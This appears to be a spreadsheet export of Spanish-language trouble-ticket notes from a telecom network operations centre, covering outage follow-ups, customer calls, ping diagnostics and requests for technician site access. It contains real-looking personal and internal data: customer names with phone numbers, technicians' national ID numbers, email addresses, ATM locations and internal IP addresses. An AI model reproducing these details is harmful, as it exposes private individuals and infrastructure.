    <t>SE LLAMÓ A CLIENTE 58652751 PARA INFORMARLE QUE SE LE REENVIÓ CORREO DONDE SE LE PIDE APOYO EN AUTORIZAR EL INGRESO DE TÉCNICO A PR PARA MAÑANA A LAS 08:00AM, NO CONTESTA. HAY CORREO SEGUIMIENTO:
ASUNTO: "CC_AZTECA_GT_SUC000471" // MOMOSTENANGO ||</t>
  </si>
  <si>
    <t xml:space="preserve">
POSIBLE FALLA DE ENERGIA, SE CONSULTA A PERSONAL DE MONITOREO DE BANCO AZTECA SOBRE EL ESTADO DE LA AGE, PUES SE TIENE CONOCIMIENTO QUE POR ASUETO DE HOY, PERSONAL DE AGENCIAS BANCARIAS NO LABORAN EL DIA DE HOY
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN ELEKTRADATOS 10.72.100.157
  PING 10.72.100.157: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.100.157 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.5
DISPLAY IP ROUTING-TABLE VPN-INSTANCE ELEKTRADATOS 10.72.100.157
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : ELEKTRADATOS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.72.100.144/28  DIRECT  0    0             D   10.72.100.147   VLANIF339			</t>
  </si>
  <si>
    <t>*/*/SE NOTIFICA POR SKYPE QUE SE ASOCIA SD1141492 A F4624277*/*/*/</t>
  </si>
  <si>
    <t>F4624283</t>
  </si>
  <si>
    <t>SE LLAMA A EJECUTIVA KARLA  GALVEZ NO SE TIENE RESPUESTA, SE NECESITA VALIDAR SI LOGRO COMUNICARSE ELLA CON EL CLIENTE Y EXPLICARLE EL TEMA DE QUE EL CARRIER DE LA LLAMADA ORIGINADA EN USA ES EL QUE DEBE REVISAR PORQUE NO SE ESTA ENTREGANDO LA LLAMADA A LA RED DE CLARO. SE INTENTARÁ CONTACTAR EL DIA LUNES EN HORARIO HABIL. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SE LLAMA A EJECUTIVA DE CUENTA KARLA NO RESPONDE, SE NECESITA VALIDAR SI TRANSMITIÓ INFORMACIÓN AL CLIENTE  CON RESPECTO AL REPORTE QUE DEBE HACER EL CLIENTE EN ESTADOS UNIDOS Y NO AQUI EN CLARO GUATEMALA. EL CARRIER DE ESTADOS UNIDOS NO ENVIA LA LLAMADA HACIA EL CARRIER DE CLARO. SE DEBE REPORTAR EN EL ORIGEN NO EN EL DESTINO DE LA LLAMADA. EL DIA DE HOY ES FERIADO EN GUATEMALA, POSIBLEMENTE LA PARTE COMERCIAL NO LABORA.
3001672616
COLA:
NOMBRE: A: 58262567
NÚMERO: 58262567
DURACIÓN: 0:00:21
ESTADO: MARCANDO
DETALLES: 58262567
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 4/07/2022 08:22:38</t>
  </si>
  <si>
    <t>F4624292</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 MENCIONA QUE OBSERVARON UNA ALARMA DE ALATA LATENCIA CON EL TRAFICO DE PR HACIA GUADALAJARA MEXICO 11:15 - 15:29 (HORARIO MEXICO)
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001354540</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTAN DEJAN EN ESPERA MAS DE 4 MIN Y NO RETOMAN LLAMADA  SE INTENTARA LUEGO **
-ID 3001333772
**</t>
  </si>
  <si>
    <t>F4624322</t>
  </si>
  <si>
    <t>SE LLAMA  CLIENTE BAYRON MORAN 73980427 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001365704
**</t>
  </si>
  <si>
    <t>SE LLAMA  CLIENTE BAYRON MORAN 73980427 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001352863</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BAYRON MORAN AL 73980427 - 23476320 PRIMER NUMERO NO RESPONDE Y EN EL SEGUNDO INDICAN QUE YA SE RETIRO DEL SITIO QUE SE ENCUENTRA HASTA EL DIA LUNES || SE INTENTARA LUEGO NUEVAMENTE AL PRIMER NUMERO**
-ID 3001342742 - 3001343242
**</t>
  </si>
  <si>
    <t>F4624332</t>
  </si>
  <si>
    <t>SE LLAMA AACLIENTE  KAREN GOMEZ || 2441113  - 24861413  ## PERO NO SE PUEDE ESTABLECER LLAMADA. SE PEDIRA APOYO A CC SV PARA QUE NOS PROPORCIONE DATOS DE ESTE CLIENTE DEBIDO A QUE:
EL 1ER NUMERO TIENE 7 DIGITOS
EL 2 NUMERO PERTENECE AL E1 CAIDO ##
3001325760
COLA:
NOMBRE: A: 0050324861413
NÚMERO: 0050324861413
DURACIÓN: 0:00:24
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050324861413
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 1/07/2022 11:30:49
3001325893
COLA:
NOMBRE: A:
NÚMERO:
DURACIÓN: 0:00:00
ESTADO: DESCONECTADO (PRIVILEGIOS DE MARCACIÓN INSUFICIENTE)
DETALLES:
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 1/07/2022 11:30:53</t>
  </si>
  <si>
    <t>SE HABL CON CLIENTE, APLICA RESET A EQUIPO Y SERVICIO RESTABLECE ##  LCIENTE  REALIA PRUEBAS Y VALIDA ##VIVO
PORT STATUS                                	= NORMAL
DEVICE NAME                                	= M01_TSANSV15_E1_SANTA_ANA_01
NAME                                       	= FRAME:0/SLOT:1/PORT:6
ALIAS                                      	= GUERRA ACUÑA JOSE ROBERTO
LOOPBACK STATUS                            	= NO
SIGNALING MODE                             	= CCS
CRC4 FRAME VERIFY SWITCH                   	= DISABLE
LINE CODE MODE                             	= HDB3
IMPEDANCE                                  	= 75¿
WORKING MODE FOR DIGITAL SECTION ACCESS    	= DIGITAL SECTION ACCESS</t>
  </si>
  <si>
    <t>F4624349</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN RAMIREZ RAMOS 30323193 SE LE SOLICITAN DATOS DE VISITA TECNICA
-ID 3001333739
NOMBRE DEL CLIENTE: TRIBUNAL SUPREMO ELECTORAL -
UBICACIÓN:DIAGONAL 2 8-63 ZONA 2 SAN PEDRO CARCHÁ ALTAVERAPAZ
CONTACTO EN SITIO: EVELYN RAMIREZ RAMOS - 30323193
HORARIO DE ATENCION:7:00 - 18:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4624368</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE DAVID CARRANZA SOLICITANDO AVANCES ID: 3001343637
SE VERIFICA QUE HAY PRUEBAS PENDIENTES CON PR, SE LLAMA A LUIS GIRON 56977372 ID: 3001344585
SE SOLICITA APOYO A GESTOR DARWINH.ESPANA VIA TEAMS | CIC ID: 3001344999, SIN APOYO +3 MINUTOS, SE ESCALA CON LIDER KEVIN  FONSECA ID: 3001346024, SE DEJA EN CONFERENCIA  CON DARWINH.ESPANA PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>F4624375</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
C193 - LENTITUD ENLACES DE DATOS ID 625900216 / 38300649 E INTERNET 625900163</t>
  </si>
  <si>
    <t>F4624378</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MELVIN SAY AL 54891453  NO CONTESTA ENVIA A BUZON DE VOZ ||
SE INTENTARA LUEGO**
-ID 3001341480
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MELVIN SAY 54891453 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001350689</t>
  </si>
  <si>
    <t>SE LLAA A CLIENTE MELVIN SAY 54891453 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 3001347016</t>
  </si>
  <si>
    <t>F4624381</t>
  </si>
  <si>
    <t>SE VALIDA QUE CON TECNICO EL ANCHO DE BANDA LLEGA A 20 MEGAS,  CLIENTE ERIKO COCAN  EN SITIO VALIDA JUNTO A TECNICO Y CONFIRMA,
COLEGIO_CRISTIANO#PING 1.1.1.1 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 1.1.1.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 181.209.179.89
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 28/28/32 MS
COLEGIO_CRISTIANO#</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICO COCAN // 50173607  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001347679 - 3001347809</t>
  </si>
  <si>
    <t>F4624384</t>
  </si>
  <si>
    <t>**SE LLAMAA A CLIENTE SERGIO  AJANEL AL 48967794  40182760 NO CONTESTA SE INTENTARA LUEGO**
-ID 3001338821 - 3001338821
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO  AJANEL 48967794 - 40182760 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001348984 - 3001349758</t>
  </si>
  <si>
    <t>F4624386</t>
  </si>
  <si>
    <t>CLIENTE JONATHAN MENDOZA REALIZA PRUEBAS DE LLAMADA Y VALIDA EL E1 ACTIVO, AUTORIZA EL CIERRE DEL CASO.
3001458880
COLA:
NOMBRE: A: 0050377733688
NÚMERO: 0050377733688
DURACIÓN: 0:10:49
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050377733688
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 02/07/2022 08:47:53 A. M.</t>
  </si>
  <si>
    <t>F4624413</t>
  </si>
  <si>
    <t>GESTION DE ACCESOS F4624413 | IP2001220SV | ANTIGUO CUSCATLAN PLAZA MALTA BLVD. ORDEN DE MALTAS/N
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:JUAN.PLEITEZ@PROMERICA.COM.SV &lt;JUAN.PLEITEZ@PROMERICA.COM.SV&gt;
CC:CNOCCA;GRUPO N1
VIE 01/07/2022 14:12
BUEN DÍA ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO F4624413 | IP2001220SV | ANTIGUO CUSCATLAN   PLAZA MALTA         BLVD. ORDEN DE MALTAS/N
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO MAÑANA SABADO 02/07/2022 A LAS 09:00
TECNICO:
DUI¿¿¿CODIGO¿¿¿¿¿¿¿¿¿¿¿¿EMPLEADO
00936126-7¿¿4799¿¿¿¿¿¿¿¿MARIO ERNESTO CRUZ MARQUEZ
00354722-1¿¿4378¿¿¿¿¿¿¿¿RONAL MOREL CRESPIN
00157708-4¿¿4690¿¿¿¿¿¿¿¿ABRAHAM SAMUEL PEREZ
02085886-3¿¿4492¿¿¿¿¿¿¿¿ JESUS OPICO CASTILLO
01101266-2¿¿4605¿¿¿¿¿¿¿¿ JOSE SALVADOR PORTILLO VELASQUEZ
01320096-0¿¿9401¿¿¿¿¿¿¿¿OSCAR RENE VIDES
00128596-2¿¿2987¿¿¿¿¿¿¿¿DANIEL MARTINES
02884962-2¿¿4551¿¿¿¿¿¿¿¿  RENE RAMON ALVARENGA
02400310-1¿¿3796¿¿¿¿¿¿¿¿EDGAR MAURICIO MONTOYA SANCHEZ
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANSISCO COMENTA QUE SE REPROGRAME LA VISITA PARA EL DIA LUNES A LAS 8:00 AM, ESTARA RESPONDIENDO CORREO
3001468136
COLA:
NOMBRE: A: 50371187100
NÚMERO: 50371187100
DURACIÓN: 0:01:43
ESTADO: CONECTADA
DETALLES: 50371187100
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 2/07/2022 09:26:07</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO PLEITEZ 71187100 MENCIONA QUE REALIZARON UN TRASLADO Y QUE NO ES LA DIRECCION QUE SE ENVIO EN EL CORREO
CLIENTE INDICA QUE GESTIONARA LOS PERMISOS Y ESTARA ENVIANDO POR CORREO LA DIRECCION EXACTA
-ID 3001415848</t>
  </si>
  <si>
    <t>F4624443</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 MENCIONA QUE POR NO ESTAR EN UN CC NO ES NECESARIO TRAMITAR PERMISOS
-ID 3001377609</t>
  </si>
  <si>
    <t>F4624448</t>
  </si>
  <si>
    <t>SE VALIDA SERVICIO OPERATIVO, SE VALIAD QUE SI SE DESCONECTA SERVICIO PRINCIPAL, SERVICIO REDUNDANTE ENTRA EN FUNSIONAMIENTO, SE VALIDA CON CLEINTE JOSE FERNANDEZ EN SITIO Y SE REALIZA TEST DE ANCHO DE BANDA CON EXITO
&lt;SAPOSVZXN1D1EID1&gt;PING -C 1000 -M 70 -BR -S 500 -VPN-INSTANCE INTERNET_ID_ESV 10.189.23.145
  PING 10.189.23.145: 500  DATA BYTES, PRESS CTRL_C TO BREAK
    ...............!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.....................!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.189.23.145 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    964 PACKET(S) RECEIVED
    3.60% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS</t>
  </si>
  <si>
    <t>F4624475</t>
  </si>
  <si>
    <t>CLIENTE JORGE CHAVEZ 78538692 INDICA QUE NO HAN PRESENTADO PROBLEMAS. SERVICIO SE HA MANTENIDO EN OBSERVACIÓN Y NO HA PRESENTADO INCONVENIENTE. EL E1 SE ENCUENTRA FUNCIONANDO SIN ALARMAS, POR LO QUE SE PROCEDE AL CIERRE DEL CASO. ID DE LLAMADA: 1001122890</t>
  </si>
  <si>
    <t>SE LOGRA CONTACTAR A CLIENTE LICDA. MARÍA VILLALTA 78522864 INDICA QUE HOY NO LABORARON, SOLICITA SE VALIDE MAÑANA 05/07 A LAS 13 HORAS.
ID DE LLAMADA: 3001742912</t>
  </si>
  <si>
    <t>CLIENTE MARÍA VILLALTA 78522864 COMENTA QUE CONTINÚAN REALIZANDO PRUEBAS, EL DÍA DE HOY PRESENTÓ ALGUNAS LLAMADAS CON PROBLEMA PERO RESTABLECIÓ. SOLICITA SE VALIDE MAÑANA AL MEDIO DÍA. 3001935024</t>
  </si>
  <si>
    <t>CLIENTE LICDA MARIA VILLALTA 78522864  COMENTA QUE TUVO UNA LLAMADA SALIENTE EL DÍA DE HOY LA CUAL SE CORTÓ, ADICIONAL A ELLO NO LE HA DADO OTRO INCONVENIENTE, SOLICITA SE VALIDE EL DÍA LUNES A LAS 13:00 HORAS PARA VALIDAR. INDICA QUE NO LABORAN EL FIN DE SEMANA. ID: 3001367437</t>
  </si>
  <si>
    <t>F4624486</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE XINIA AYALA  AL 22109500 NO RESPONDE || SE INTENTARA LUEGO**
-ID 3001376452
**</t>
  </si>
  <si>
    <t>F4624487</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JUAN PABLO FLORES QUIEN INDICA QUE VA A REVISAR SU RED INTERNA Y AUTORIZA EL CIERRE.
3001425020
COLA:
NOMBRE: A: 55107004
NÚMERO: 55107004
DURACIÓN: 0:00:56
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55107004
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/07/2022 17:34:36</t>
  </si>
  <si>
    <t>F4624504</t>
  </si>
  <si>
    <t>SE VALIDA EL HISTORIAL DEL ID 361700451T Y EN LA FALLA F4620261 CLIENTE HABIA CONFIRMADO QUE SOLICITARON LA BAJA DEL SERVICIO
SE LLAMA A CLIENTE OTTO PERALTA 54136232 QUIEN CONFIRMA QUE LE HABIAN DADO DE BAJA POR SER UN SERVICIO INALAMBRICO
-ID 3001841897</t>
  </si>
  <si>
    <t>SE HABLÓ CON OTTO PERALTA/CLIENTE 54136232 INDICA QUE HACE 20 DÍAS LE DEJARON UN EQUIPO EN PR, PERO LLEGÓ TÉCNICO CLARO Y LO RETIRÓ, PUES AÚN NO HABÍAN HECHO SUS PRUEBAS; CLIENTE PIDE QUE SE VERIFIQUE DEL LADO NUESTRO SI VAN A REGRESAR DE NUEVO EL EQUIPO, SÍ ASÍ FUERA PIDE SE LE LLAME MAÑANA A LAS 08:00AM PARA SEGUIMIENTO, EN ESTE MOMENTO NO HAY PERSONAL EN SITIO.</t>
  </si>
  <si>
    <t>F4624511</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARIA FERNANDA, QUIEN INDICA QUE EL SERVICIO DE TELEFONIA NO TIENE INCONVENIENTES.
ELLA REPORTA EL INTERNET.
3001405894
COLA:
NOMBRE: A: 0050663317476
NÚMERO: 0050663317476
DURACIÓN: 0:00:10
ESTADO: CONECTADA
DETALLES: 0050663317476
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/07/2022 16:07:15</t>
  </si>
  <si>
    <t>F4624522</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 1 DE JULIO DE 2022 15:29PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE PRINCIPAL ALARMADO PARA CLIENTE "CC_TYT_GT_ATM4761"
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL ENLACE PRINCIPAL, SOLICITAMOS SU APOYO PARA VALIDAR QUE EQUIPOS DE ÚLTIMA MILLA "CTC UNION" SE ENCUENTRE ENERGIZADO Y VALIDAR CONEXIONES ENTRE DICHO EQUIPO Y ROUTER TELDAT Y APLICAR REINICIO SOBRE AMBOS EQUIPOS, SE ADJUNTA TELÉFONOS DEL CNOC 24206231 CON OPCIÓN 1/2 SI SE REQUIERE APOYO.
NOTA: ACTUALMENTE EL CAJERO SE ENCUENTRA OPERANDO VÍA ENLACE REDUNDANTE 3G POR LO QUE NOTARAN ELEVADOS TIEMPOS DE RESPUESTA.
TICKET: F4624522
ID: 47503840T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM4761
UBICADO EN:  AVENIDA CENTROAMERICA 1-40 ZONA 3 ESCUINTLA C.C PRADERA ESCUINTLA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMO A 5B CONTESTA DANIEL ENVIARAN A SUPERVISOR A REVISAR EQUPOS Y APLICAR RESET SOBRE LOS MISMOS.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 18:27
FIN: HOY, 18:34
DURACIÓN: 6:09
ID DE LLAMADA: 3001432476</t>
  </si>
  <si>
    <t>F4624538</t>
  </si>
  <si>
    <t>F4624555</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROSA MENESES 86478066 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001677043</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROSA MENESES 86478066   QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVIVIO
-ID 3001764544</t>
  </si>
  <si>
    <t>F4624558</t>
  </si>
  <si>
    <t>SE VALIDA CON PERSONAL DE MONITOREO 5B, ATIENDE MOISES, SE LE INFORMA QUE SE TIENE INTERMITENCIA EN LA COMUNICACION HACIA ATM, INDICA QUE SI TIENEN TRABAJOS COORDINADOS EL DIA DE HOY PERO QUE AUN NO HAN FINALIZADO SEGUN LA INFORMACION QUE TIENE PERO QUE POSIBLEMENTE EN EL TRANSCURSO DE LA TARDE FINALIZAN, SE OBSERVA QUE EL DIA DE HOY HA GENERADO 4 ALARMAS Y SE OBSERVAN LOGS DE CAIDA DE LA F.O. EN EL ETX1300, POR LO QUE SE MANTENDRA EN OBSERVACION HASTA EL DIA DE MAÑANA Y DE CONTINUAR CON INTERMITENCIA SE LLAMARA NUEVAMENTE A 5B Y SE COORDINARA PERSONAL PARA CERTIFICACION DE F.O.
ID
3001395534
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:02:38
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 1/07/2022 15:36:03</t>
  </si>
  <si>
    <t>SE ENVIA CORREO SOLICITANDO ACCESOS
GESTION DE APERTURA F4624558 | ATM3376 | SHELL SELECT LA VILLA - 13 AV. 20-01 ZONA 10
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:OPERADORESIST@5B.COM.GT; SUPERVISORES_OSI@5B.COM.GT &lt;SUPERVISORES_OSI@5B.COM.GT&gt;Y 5 MÁS
CC:CNOCCA;GRUPO N1
SÁB 02/07/2022 17:29
BUENA TARDE ESTIMADO CLIENTE,
ES UN GUSTO SALUDARLE  EL PRESENTE ES PARA SOLICITAR DE SU AMABLE APOYO GESTIONANDO APERTURA DE CAJERO F4624558 | ATM3376 |  SHELL SELECT LA VILLA - 13 AV. 20-01 ZONA 10 | EL CUAL DE MANERA PROACTIVA VEMOS QUE PRESENTA INESTABILIDAD.
SOLICITAMOS SU APOYO GESTIONANDO APERTURA DOMINGO 03/07/2022 A LAS 10:00
POSIBLES TECNICOS
DPI	IBM	TECNICO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EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>SE HABLA A MONITOREO 5B ATIENDE FREDY, SE LE INFORMA DE INTERMITENCIA EN COMUNICACIN HACIA ATM, ASI TAMBIEN QUE EL DIA DE AYER INFORMARON QUE ESTABAN TRABAJANDO EN ATM SIN EMBARGO INDICA QUE YA NO HAY PERSONAL EN SITIO, SE ACUERDA VISITA EN CONJUNTO PARA CERTIFICACION DE F.O. Y REVISION DE EQUIPO CTC POR LAS CAIDAS CONSTANTES EN EL MONITOREO, SERVICIO REINCIDENTE.
ID
3001557938
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:01:22
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 2/07/2022 16:58:35</t>
  </si>
  <si>
    <t>SE LLAMA PERO CUELGAN LLAMADA, MONITOREO 5B 24207212
ID
3001557841
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:00:36
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 2/07/2022 16:57:08</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL QUIEN SE COMUNICA CON PERSONAL DE TAVSA Y MENCIONA QUE SI ESTA COORDINADA LA VISITA PARA HOY A LAS 10:00 HRS
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001684363 - 3001684455 - 3001684693</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 24207200 CONTESTA EL SEÑOR CRISTIAN E INDICA QUE SE TIENE QUE VALIDAR VISITA POR MEDIO DE CORREO || SE NOTIFICA A GESTOR **
-ID 3001675137
**</t>
  </si>
  <si>
    <t>F4624585</t>
  </si>
  <si>
    <t>SE TIENE A ACLIENTE DELMI MALDONADO-45639497 EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>F4624597</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE ALEXANDER JEREZ 54863918 ID: 3001440608 /
CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT | SE NOTIFICA A ALEJANDRO.NAVARRO VIA TEAMS | WIP</t>
  </si>
  <si>
    <t>F4624607</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO 5B ATIENDE DANIEL, SE LE INFORMA ENLACE PRINCIPAL ALARMADO Y OPERATIVO POR 3G, ADICIONAL SE INFORMA DE CORREO ENVIADO EN DONDE SE ESPECIFICA QUE SE DEBE VALIDAR QUE EQUIPO DE MARCA CTC ESTE ENERGIZADO YA QUE ESTA DOWN DESDE EL NODO Y DOWN EL PUERTO WAN DEL TELDAT. INFORMA QUE ESTARA ENVIANDO SUPERVISOR A VALIDAR.
ID
3001959806
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:02:00
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 5/07/2022 15:08:09</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO APOYO CON LOS EQUIPOS EN PUNTO REMOTO.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 4 DE JULIO DE 2022 15:58PARA: CARLOS FELIPE VELASQUEZ CRISTAL &lt;CARLOSF.VELASQUEZ@CLARO.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;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TYT.COM.GT&gt;ASUNTO: RE: CAJEROS ATM ATM5058 CAIDA DE SERVICIO
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL ENLACE PRINCIPAL, SOLICITAMOS SU APOYO PARA VALIDAR QUE EQUIPOS DE ÚLTIMA MILLA "CTC UNION" SE ENCUENTRE ENERGIZADO Y VALIDAR CONEXIONES ENTRE DICHO EQUIPO Y ROUTER TELDAT Y APLICAR REINICIO SOBRE AMBOS EQUIPOS, SE ADJUNTA TELÉFONOS DEL CNOC 24206231 CON OPCIÓN 1/2 SI SE REQUIERE APOYO.
